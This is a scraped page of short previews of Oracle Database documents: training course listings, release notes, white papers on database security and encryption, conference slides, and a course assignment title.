D77758GC20 - Oracle Database 12c R1: New Features for Administrators Ed 2 Czas trwania: Czas trwania: 5 dni / 40 godz. Cena rynkowa: 7 450,00 zł Cena promocyjna: Zadzwoń - 801 30 30 30 Szkolenie autoryzowane:
More informationSQL*Plus. About these Release Notes. Documentation Accessibility. Access to Oracle Support. Certification
SQL*Plus Release Notes Release 12.2 E54619-07 May 2017 About these Release Notes This document summarizes requirements, differences between SQL*Plus and its documented functionality, new features in this
More informationTestsDumps. Latest Test Dumps for IT Exam Certification
TestsDumps http://www.testsdumps.com Latest Test Dumps for IT Exam Certification Exam : 1z1-067 Title : Upgrade Oracle9i/10g/11g OCA to Oracle Database 12c OCP Vendor : Oracle Version : DEMO 1 NO.1 Examine
More informationAn Oracle White Paper October Deploying and Developing Oracle Application Express with Oracle Database 12c
An Oracle White Paper October 2013 Deploying and Developing Oracle Application Express with Oracle Database 12c Disclaimer The following is intended to outline our general product direction. It is intended
More informationD78846GC30 - Oracle Database 12c R2: Administration Workshop Ed 3
D78846GC30 - Oracle Database 12c R2: Administration Workshop Ed 3 Czas trwania: Czas trwania: 5 dni / 40 godz. Cena rynkowa: 7 450,00 zł Cena promocyjna: Zadzwoń - 801 30 30 30 Szkolenie autoryzowane:
More informationISBN MHID Copy Editor Margaret Berson
McGraw-Hill Education books are available at special quantity discounts to use as premiums and sales promotions, or for use in corporate training programs. To contact a representative, please visit the
More informationTECHNOLOGY: Security Encrypting Tablespaces
TECHNOLOGY: Security Encrypting Tablespaces By Arup Nanda Encrypt tablespaces transparently without affecting performance. In an era when data security is critical in almost every type of business, databases
More information$ whoami. Oracle Audit. Agenda. Learning objectives. Overview of Oracle Architecture Oracle audit types Operating system audit Database audit
$ whoami Oracle Audit ISACA Charlotte 2019 Currently - Audit Analytics Leader - Wells Fargo Formerly - Information Security Officer/ Security Engineer, DBA, software engineer Ethical hacker Python hacker
More informationOracle Database: SQL and PL/SQL Fundamentals
Oracle University Contact Us: 001-855-844-3881 & 001-800-514-06-9 7 Oracle Database: SQL and PL/SQL Fundamentals Duration: 5 Days What you will learn This Oracle Database: SQL and PL/SQL Fundamentals training
More informationOracle Audit Vault. Trust-but-Verify for Enterprise Databases. Tammy Bednar Sr. Principal Product Manager Oracle Database Security
Oracle Audit Vault Trust-but-Verify for Enterprise Databases Tammy Bednar Sr. Principal Product Manager Oracle Database Security Agenda Business Drivers Audit Vault Overview Audit
More informationORACLE 12C PLUGGABLE DATABASE FEATURE INSIGHTS
ORACLE 12C PLUGGABLE DATABASE FEATURE INSIGHTS Kirill Loifman, 21/02/2013 Oracle Certified Professional DBA email: loifmkir@gmail.com www: dadbm.com Twitter: @loifmkir ORACLE 12C PLUGGABLE DATABASE (PDB)
More informationOracle Database 12c R2: New Features for Administrators Part 1 Ed 1
Oracle University Contact Us: +27 (0)11 319-4111 Oracle Database 12c R2: New Features for Administrators Part 1 Ed 1 Duration: 5 Days What you will learn Throughout the lessons of the Oracle Database 12c
More informationCopyright 2013, Oracle and/or its affiliates. All rights reserved.
1 ALM with Visual Studio: SQL and PL/SQL Development, Source Control, and Deployment Christian Shay Product Manager, Oracle Program Agenda SQL and PL/SQL Development Lifecycle Overview Create Development
More informationKey Drivers for Data Security
Security User Management Access Control Data Protection Monitoring Key Drivers for Data Security Regulatory Compliance Sarbanes-Oxley (SOX), Foreign Exchange Instruments and Exchange Law (J-SOX) EU Privacy
More informationOracle Database Vault with Oracle Database 12c ORACLE WHITE PAPER MAY 2015
Oracle Database Vault with Oracle Database 12c ORACLE WHITE PAPER MAY 2015 Table of Contents Introduction 1 Controls for Privileged Accounts 2 Privilege User Access Controls on Application Data with Realms
More informationOracle 12C DBA Online Training. Course Modules of Oracle 12C DBA Online Training: 1 Oracle Database 12c: Introduction to SQL:
Course Modules of Oracle 12C DBA Online Training: 1 Oracle Database 12c: Introduction to SQL: A. Introduction Course Objectives, Course Agenda and Appendixes Used in this Course Overview of Oracle Database
More informationHow To Drop All Tables In A Schema In Oracle 10g
How To Drop All Tables In A Schema In Oracle 10g Imports/exports all schema object types If you run Oracle Application Express with Oracle Database 10g release 1 (10.1) or later, you can generate When
More informationOracle Database 12c: RAC Administration Ed 1
Oracle University Contact Us: +7 (495) 641-14-00 Oracle Database 12c: RAC Administration Ed 1 Duration: 4 Days What you will learn This Oracle Database 12c: RAC Administration training will teach you about
More informationPl Sql Copy Table From One Schema To Another
Pl Sql Copy Table From One Schema To Another I know how to do this using MS SQL Server. you want to copy a table from one schema to another, or from one database to another, and keep the same table name.
More informationOracle Database 12c: OCM Exam Preparation Workshop Ed 1
Oracle University Contact Us: Local: 1800 103 4775 Intl: +91 80 67863102 Oracle Database 12c: OCM Exam Preparation Workshop Ed 1 Duration: 5 Days What you will learn The Oracle Database 12c: OCM Exam Preparation
More informationUse Case: Enhance security for a database with sensitive data. Koen Van Bastelaere Oracle DBA
Use Case: Enhance security for a database with sensitive data Koen Van Bastelaere Oracle DBA Agenda About me The project OS Database Application Encryption and identity Q&A 2 Agenda About me The project
More informationTransparent Data Encryption
Transparent Data Encryption DOAG SID SAP & Oracle June 2007 Andreas Becker Senior Member Technical Staff Oracle Server Technologies - SAP Development Agenda Transparent Data Encrytion
More informationOracle Database Vault
Oracle Database Vault Best Practices ORACLE WHITE PAPER MAY 2015 Table of Contents Executive Overview 2 Installation 3 Pre-Installation Notes 3 Separation of Duty 3 Separation of Duty Matrix 4 Oracle Database
More informationAssignment 6. This lab should be performed under the Oracle Linux VM provided in the course.
Assignment 6 This assignment includes hands-on exercises in the Oracle VM. It has two Parts. Part 1 is SQL Injection Lab and Part 2 is Encryption Lab. Deliverables You will be submitting evidence that
More informationCopyright 2013, Oracle and/or its affiliates. All rights reserved.
1 Upgrade to Oracle Database 12c 何革新 Gexin.he@oracle.com The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into
More informationOracle Database Cloud for Oracle DBAs Ed 3
Oracle University Contact Us: 800-260-690 Oracle Database Cloud for Oracle DBAs Ed 3 Duration: 3 Days What you will learn Note: No hands-on lab environment for the Training On Demand course format This
More informationOracle Multitenant What s new in Oracle Database 12c Release ?
Oracle Multitenant What s new in Oracle Database 12c Release 12.1.0.2? Saurabh K. Gupta Principal Technologist, Database Product Management Who am I? Principal Technologist, Database Product Management
More informationCHAPTER. Upgrading to Oracle Database 11g
CHAPTER 2 Upgrading to Oracle Database 11g 49 50 Oracle Database 11g DBA Handbook I f you have previously installed an earlier version of the Oracle database server, you can upgrade your database to Oracle
More informationHelp Us Help You - TFA Collector and the Support Tools Bundle
Help Us Help You - TFA Collector and the Support Tools Bundle Bryan Vongray Senior Principal Technical Support Engineer Oracle Support October 24, 2018 Copyright 2018, Oracle and/or its affiliates. All
More information